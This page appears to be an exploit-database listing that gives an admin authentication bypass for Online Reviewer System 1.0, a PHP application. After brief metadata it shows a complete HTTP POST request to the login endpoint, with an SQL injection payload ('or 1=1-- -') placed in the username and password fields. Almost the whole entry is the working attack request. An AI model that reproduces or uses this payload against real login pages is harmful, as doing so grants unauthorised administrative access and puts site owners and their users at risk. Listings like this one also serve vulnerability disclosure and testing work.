Exploit for Online Reviewer System 1.0 SQL Injection

Name: Exploit for Online Reviewer System 1.0 SQL Injection
Rating: 5 (217 reviews)

2021-02-01 | CVSS 0.9

## https://sploitus.com/exploit?id=PACKETSTORM:161225
# Exploit Title: Online Reviewer System (PHPPDO) - Admin Authentication Bypass  
# Exploit Author: Richard Jones  
# Date: 2021-01-31  
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
#Exploit URL: http://TARGET//reviewer/login/  
POST /reviewer/login/ HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70  
Cookie: PHPSESSID=e7vm5jbstk9ii5ghh7sm7n1mbc  
Upgrade-Insecure-Requests: 1  
  
username=a%27+or+1%3D1--+-&password=a%27+or+1%3D1--+-&btn-login=Log+In